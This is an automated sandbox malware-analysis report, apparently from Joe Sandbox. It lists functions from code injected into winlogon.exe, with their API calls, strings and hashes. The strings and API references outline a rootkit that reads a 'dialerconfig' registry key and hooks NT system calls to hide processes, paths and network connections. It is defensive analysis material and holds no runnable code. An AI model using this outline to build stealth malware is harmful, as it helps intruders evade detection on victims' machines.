Function 00007FFE7DF34CBE Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1408921937.00007FFE7DF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe7df30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81267c2e894e60db3d4ac15f2268a505fb04a2485a363f5e751c4fc8cd30f40f
Instruction ID: 82442f39d868adeab1138ff993a6325cce46d0f67d4ac9b7b5593ec06db3b162
Opcode Fuzzy Hash: 81267c2e894e60db3d4ac15f2268a505fb04a2485a363f5e751c4fc8cd30f40f
Instruction Fuzzy Hash: A601FF3290D6848FE76AFB2CA8454A8BBE0FF41320B0901BBD06DCB063E626AC54C705

Function 00007FFE7DF353E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1408921937.00007FFE7DF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe7df30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f8aca77b87f9ef16d75743d676047026a22584c86c2ad89418c322b7fa7f56f
Instruction ID: 9da30d264e07bae295e035884256743d361c8af840e8d9941c9ab73e909b122c
Opcode Fuzzy Hash: 0f8aca77b87f9ef16d75743d676047026a22584c86c2ad89418c322b7fa7f56f
Instruction Fuzzy Hash: 60F0A73131CF044FE744EE1DE445665B3D0FBA8310F10452FE449C3651DA21E4818782

Function 00007FFE7DE6368A Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1408245209.00007FFE7DE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe7de60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 493f93de88153ad9927e6c8445d5f07d4e073f9849a6da683bf876f1de00c95c
Instruction ID: c4a78ccb9e04f24b5a95357efcbd092eb3d51eb14effacf5282fa505b0cea368
Opcode Fuzzy Hash: 493f93de88153ad9927e6c8445d5f07d4e073f9849a6da683bf876f1de00c95c
Instruction Fuzzy Hash: ABD05B3170C8184FDF98EA5CF451BE57381D7953207144166D40AC7285DD16DC82C7C0

Analysis Process: winlogon.exePID: 552, Parent PID: 8108COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	94.1%
Signature Coverage:	0%
Total number of Nodes:	102
Total number of Limit Nodes:	16

Executed Functions

Function 000002EA8A691650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002EA8A69165B
HeapAlloc.KERNEL32 ref: 000002EA8A69166A

Part of subcall function 000002EA8A691274: GetProcessHeap.KERNEL32 ref: 000002EA8A69127A
Part of subcall function 000002EA8A691274: HeapAlloc.KERNEL32 ref: 000002EA8A691289
Part of subcall function 000002EA8A691274: GetProcessHeap.KERNEL32 ref: 000002EA8A6912A3
Part of subcall function 000002EA8A691274: HeapAlloc.KERNEL32 ref: 000002EA8A6912B4

RegOpenKeyExW.ADVAPI32 ref: 000002EA8A6916DA
RegOpenKeyExW.ADVAPI32 ref: 000002EA8A691707
RegCloseKey.ADVAPI32 ref: 000002EA8A691721
RegOpenKeyExW.ADVAPI32 ref: 000002EA8A691741
RegCloseKey.ADVAPI32 ref: 000002EA8A69175C
RegOpenKeyExW.ADVAPI32 ref: 000002EA8A69177C
RegCloseKey.ADVAPI32 ref: 000002EA8A691797
RegOpenKeyExW.ADVAPI32 ref: 000002EA8A6917B7
RegCloseKey.ADVAPI32 ref: 000002EA8A6917D2
RegOpenKeyExW.ADVAPI32 ref: 000002EA8A6917F2
RegCloseKey.ADVAPI32 ref: 000002EA8A69180D
RegOpenKeyExW.ADVAPI32 ref: 000002EA8A69182D
RegCloseKey.ADVAPI32 ref: 000002EA8A691848
RegOpenKeyExW.ADVAPI32 ref: 000002EA8A691868
RegCloseKey.ADVAPI32 ref: 000002EA8A691883
RegOpenKeyExW.ADVAPI32 ref: 000002EA8A6918A3
RegCloseKey.ADVAPI32 ref: 000002EA8A6918BE
RegCloseKey.ADVAPI32 ref: 000002EA8A6918C8

Part of subcall function 000002EA8A6912C8: RegQueryInfoKeyW.ADVAPI32 ref: 000002EA8A691326
Part of subcall function 000002EA8A6912C8: GetProcessHeap.KERNEL32 ref: 000002EA8A691334
Part of subcall function 000002EA8A6912C8: HeapAlloc.KERNEL32 ref: 000002EA8A691345
Part of subcall function 000002EA8A6912C8: RegEnumValueW.ADVAPI32 ref: 000002EA8A6913A1
Part of subcall function 000002EA8A6912C8: GetProcessHeap.KERNEL32 ref: 000002EA8A6913E9
Part of subcall function 000002EA8A6912C8: HeapAlloc.KERNEL32 ref: 000002EA8A6913F7
Part of subcall function 000002EA8A6912C8: GetProcessHeap.KERNEL32 ref: 000002EA8A69141B
Part of subcall function 000002EA8A6912C8: HeapFree.KERNEL32 ref: 000002EA8A691429
Part of subcall function 000002EA8A6912C8: lstrlenW.KERNEL32 ref: 000002EA8A691432
Part of subcall function 000002EA8A6912C8: GetProcessHeap.KERNEL32 ref: 000002EA8A691440
Part of subcall function 000002EA8A6912C8: HeapAlloc.KERNEL32 ref: 000002EA8A69144E

Strings

pid, xrefs: 000002EA8A69173A
service_names, xrefs: 000002EA8A6917EB
paths, xrefs: 000002EA8A6917B0
udp, xrefs: 000002EA8A69189C
startup, xrefs: 000002EA8A6916FD
tcp_local, xrefs: 000002EA8A691826
SOFTWARE\dialerconfig, xrefs: 000002EA8A6916BA
tcp_remote, xrefs: 000002EA8A691861
process_names, xrefs: 000002EA8A691775

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: db3879c5ad0b98bad965bb20c8a30dc2db96578691c2fed79534ac332aac2b2a
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: BE713936350A9185EF90EF61E88869D63A4FB95B88F045172DE5F47B6CDF38E444D301

Function 000002EA8A695C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000002EA8A695C4B
GetThreadContext.KERNEL32 ref: 000002EA8A695DB5

Part of subcall function 000002EA8A695A40: GetCurrentThreadId.KERNEL32 ref: 000002EA8A695A44

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction ID: 7abc3399b7363da3a6ea01246fa603f01a3695a5164fbe89fa8487ef91b524c8
Opcode Fuzzy Hash: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction Fuzzy Hash: 29D1DD76248B88C1DEB0DB0AE49835A77A0F3C8B94F144166EACE47BA9DF3CD545CB01

Function 000002EA8A6951B0 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000002EA8A695236

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction ID: 8d6460839d33d96f242abc21ba7c0c12df2750016f6a5bc3f4448c71370291fe
Opcode Fuzzy Hash: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction Fuzzy Hash: 5402C732259BC086EBA0CB55F49835AB7A0F3C4794F145166EB8E87BA9DF7CD484CB01

Function 000002EA8A693878 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 000002EA8A693886
GetCurrentProcess.KERNEL32 ref: 000002EA8A6938B4
VirtualProtectEx.KERNEL32 ref: 000002EA8A6938D6
GetCurrentProcess.KERNEL32 ref: 000002EA8A6938F4
VirtualProtectEx.KERNEL32 ref: 000002EA8A693915

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 521264bbf53bd2b0813ca0a2650e39ac3417809bf0e9bb18f90cf4a93a97dc9a
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: DD113C2A744B8282EF94DB21F40876AB6B0F749B84F084079DE9E07798EF3DE505C701

Function 000002EA8A693AC0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000002EA8A693B46
VirtualAlloc.KERNEL32 ref: 000002EA8A693B80

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction ID: 450e7cc7ddd998f7df9277ac51022a8db3f6fea65fb1db4acaee078049e9808a
Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction Fuzzy Hash: 59315E62259AC581EFB0DA25E05835AA3A0F398784F148579F6CF46BACDF3CD1818B02

Function 000002EA8A693458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002EA8A69347A
PathFindFileNameW.SHLWAPI ref: 000002EA8A693489

Part of subcall function 000002EA8A693930: StrCmpNIW.SHLWAPI ref: 000002EA8A693948

Part of subcall function 000002EA8A693878: GetModuleHandleW.KERNEL32 ref: 000002EA8A693886
Part of subcall function 000002EA8A693878: GetCurrentProcess.KERNEL32 ref: 000002EA8A6938B4
Part of subcall function 000002EA8A693878: VirtualProtectEx.KERNEL32 ref: 000002EA8A6938D6
Part of subcall function 000002EA8A693878: GetCurrentProcess.KERNEL32 ref: 000002EA8A6938F4
Part of subcall function 000002EA8A693878: VirtualProtectEx.KERNEL32 ref: 000002EA8A693915

CreateThread.KERNEL32 ref: 000002EA8A6934D7

Part of subcall function 000002EA8A691EB4: GetCurrentThread.KERNEL32 ref: 000002EA8A691EBF

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: ac9eb215c53734babb2a3472e520c4cd677427538a40450ffdc9329e50ab56a8
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 78115770A907D292FFE1D731E90E36922D0AB58B44F4980B99A1F852DCEF3DF4849203

Function 000002EA8A694ED0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000002EA8A694ED4
VirtualProtect.KERNEL32 ref: 000002EA8A694F17
FlushInstructionCache.KERNEL32 ref: 000002EA8A694F2C

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction ID: 8e9708fbd438fa44b350dad889db080b0ac2de83a8dc9e5857ae0fa7cae13542
Opcode Fuzzy Hash: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction Fuzzy Hash: B8F03066268B84C0EAB0DB05E45934A67A0E7CC7E4F584161FA8E07BADCE3CD1818B05

Function 000002EA8A662908 Relevance: 3.2, APIs: 2, Instructions: 186
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000002EA8A6629AA
LoadLibraryA.KERNELBASE ref: 000002EA8A662A31

Memory Dump Source

Source File: 00000008.00000002.2635017926.000002EA8A660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a660000_winlogon.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 7530aeb5896d8c73bd639e80f14959d458e078c826644fa535c5f8b5e5812d3d
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: B061F1B2B4169187EFA8CF26D48876DB391FB44B98F548135DA1E07789DB38F852C702

Function 000002EA8A691C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002EA8A691650: GetProcessHeap.KERNEL32 ref: 000002EA8A69165B
Part of subcall function 000002EA8A691650: HeapAlloc.KERNEL32 ref: 000002EA8A69166A
Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A6916DA
Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A691707
Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A691721
Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A691741
Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A69175C
Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A69177C
Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A691797
Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A6917B7
Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A6917D2
Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A6917F2

Sleep.KERNEL32 ref: 000002EA8A691C43
SleepEx.KERNELBASE ref: 000002EA8A691C49

Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A69180D
Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A69182D
Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A691848
Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A691868
Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A691883
Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A6918A3
Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A6918BE
Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A6918C8

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: ff06fb8c1534adee81013544e023c724b3c0671a7b7a89f4a78f2d2e5d28a12c
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 7431D16528068191FFD4DF36D64935E13A4AB44BC0F2C90B19E1F8779EEF28E4558252

Function 000002EA8A6E2908 Relevance: 1.4, APIs: 1, Instructions: 186
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000002EA8A6E29AA

Memory Dump Source

Source File: 00000008.00000002.2638717540.000002EA8A6E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002EA8A6E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a6e0000_winlogon.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: ea5719658bc5e9eecd2a481221e652209658dcdda67c6ccf684edb6ba3dc9695
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: C561F76274169187EFA8EF29D44876D7392F744B58F648035EA1E07789DB38F872C701

Non-executed Functions

Function 000002EA8A692CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002EA8A692D80
lstrlenW.KERNEL32 ref: 000002EA8A692FBA

Part of subcall function 000002EA8A691A14: OpenProcess.KERNEL32 ref: 000002EA8A691A3A
Part of subcall function 000002EA8A691A14: K32GetModuleFileNameExW.KERNEL32 ref: 000002EA8A691A58
Part of subcall function 000002EA8A691A14: PathFindFileNameW.SHLWAPI ref: 000002EA8A691A67
Part of subcall function 000002EA8A691A14: lstrlenW.KERNEL32 ref: 000002EA8A691A73
Part of subcall function 000002EA8A691A14: StrCpyW.SHLWAPI ref: 000002EA8A691A86
Part of subcall function 000002EA8A691A14: CloseHandle.KERNEL32 ref: 000002EA8A691A94

GetProcAddress.KERNEL32 ref: 000002EA8A692D95

Part of subcall function 000002EA8A691554: StrCmpIW.SHLWAPI ref: 000002EA8A691585

Part of subcall function 000002EA8A693930: StrCmpNIW.SHLWAPI ref: 000002EA8A693948

StrCmpNIW.SHLWAPI ref: 000002EA8A692DD8
lstrlenW.KERNEL32 ref: 000002EA8A692F00

Strings

NtQueryObject, xrefs: 000002EA8A692D8B
\Device\Nsi, xrefs: 000002EA8A692DCB
ntdll.dll, xrefs: 000002EA8A692D79

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 4ff606cf43ca66dd0d1dbb4909c543affbca855edf0c47331fd648eda6f2cc4b
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 7FB19E62250AD182EFE4CF35C4487A9A3A4F744B84F5890AAEE0F53798EF39ED40C741

Function 000002EA8A697E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002EA8A697E8C
RtlCaptureContext.NTDLL ref: 000002EA8A697EB9
RtlLookupFunctionEntry.NTDLL ref: 000002EA8A697ED3
RtlVirtualUnwind.NTDLL ref: 000002EA8A697F14
IsDebuggerPresent.KERNEL32 ref: 000002EA8A697F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000002EA8A697F89
UnhandledExceptionFilter.KERNEL32 ref: 000002EA8A697F94

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 603fa3897b978e845a85e647aea10590a24fc888b3ea771d50ca166b4455f46e
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 1E316B76244BC18AEFA0CF60E8443EE73A0F784758F44846ADA4E47B98EF38D648C710

Function 000002EA8A69B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002EA8A69B585
RtlLookupFunctionEntry.NTDLL ref: 000002EA8A69B59D
RtlVirtualUnwind.NTDLL ref: 000002EA8A69B5D8
IsDebuggerPresent.KERNEL32 ref: 000002EA8A69B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002EA8A69B61B
UnhandledExceptionFilter.KERNEL32 ref: 000002EA8A69B626

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 7bd76fdf4471c7d590cbd953dba6e3f61b7255ddb524ccc559ff26acaece1cb8
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 5C318F36244FC086EFA0CF25E84439E73A4F789758F584166EA9E43BA8DF38D545CB01

Function 000002EA8A69FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002EA8A69FF67
WriteFile.KERNEL32 ref: 000002EA8A6A021E
WriteFile.KERNEL32 ref: 000002EA8A6A0270
GetLastError.KERNEL32 ref: 000002EA8A6A0372
GetLastError.KERNEL32 ref: 000002EA8A6A03D2

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: d0a20c7a0dd2e52de3909a8f97bb1d337f9f021abfa7e43b4267e329d18488c8
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: CBE1FE32B44AC09AEB40CF64D0882DD7BB1F345788F1581A6EE5F57B9DDA38E91AC701

Function 000002EA8A69BE3C Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
Instruction ID: 6f358f4afe48e5772dd630dd6965a65b88f9fb91963de1c2ab91f7ce5a4d9654
Opcode Fuzzy Hash: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
Instruction Fuzzy Hash: 3D51F1227407D088FBA0DB76E90839E7BA5B340BE4F188264EE9E47B99CB3CD501C701

Function 000002EA8A6714A0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2635017926.000002EA8A660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a660000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
Instruction ID: 03605c53b65520a6a92434e7bf1d928df83f7f57f37f2d401dd882558ec5d730
Opcode Fuzzy Hash: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
Instruction Fuzzy Hash: C8F062B17642948AEFE8CF28E84672977E1F308384F808569D69EC3B18E33C90609F05

Function 000002EA8A6912C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002EA8A691326
GetProcessHeap.KERNEL32 ref: 000002EA8A691334
HeapAlloc.KERNEL32 ref: 000002EA8A691345
RegEnumValueW.ADVAPI32 ref: 000002EA8A6913A1

Part of subcall function 000002EA8A691554: StrCmpIW.SHLWAPI ref: 000002EA8A691585

GetProcessHeap.KERNEL32 ref: 000002EA8A6913E9
HeapAlloc.KERNEL32 ref: 000002EA8A6913F7
GetProcessHeap.KERNEL32 ref: 000002EA8A69141B
HeapFree.KERNEL32 ref: 000002EA8A691429
lstrlenW.KERNEL32 ref: 000002EA8A691432
GetProcessHeap.KERNEL32 ref: 000002EA8A691440
HeapAlloc.KERNEL32 ref: 000002EA8A69144E
StrCpyW.SHLWAPI ref: 000002EA8A691470
GetProcessHeap.KERNEL32 ref: 000002EA8A691485
HeapFree.KERNEL32 ref: 000002EA8A691493

Strings

d, xrefs: 000002EA8A691365

Memory Dump Source

Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: aa545f155cb9358a8ffc49b630f2ad5ef1103a6709a8d2901a6cedeb3d5f76da
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 1C519A76244B8593EB90CF62E54839AB3A1F788F80F448135DA8E47B58DF3CE456CB01

Function 000002EA8A691EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002EA8A691EBF

Part of subcall function 000002EA8A692174: GetModuleHandleA.KERNEL32 ref: 000002EA8A69218C
Part of subcall function 000002EA8A692174: GetProcAddress.KERNEL32 ref: 000002EA8A69219D

Part of subcall function 000002EA8A695C10: GetCurrentThreadId.KERNEL32 ref: 000002EA8A695C4B

Strings

NtQueryDirectoryFileEx, xrefs: 000002EA8A691F3C
NtResumeThread, xrefs: 000002EA8A691F02
NtEnumerateValueKey, xrefs: 000002EA8A691F76
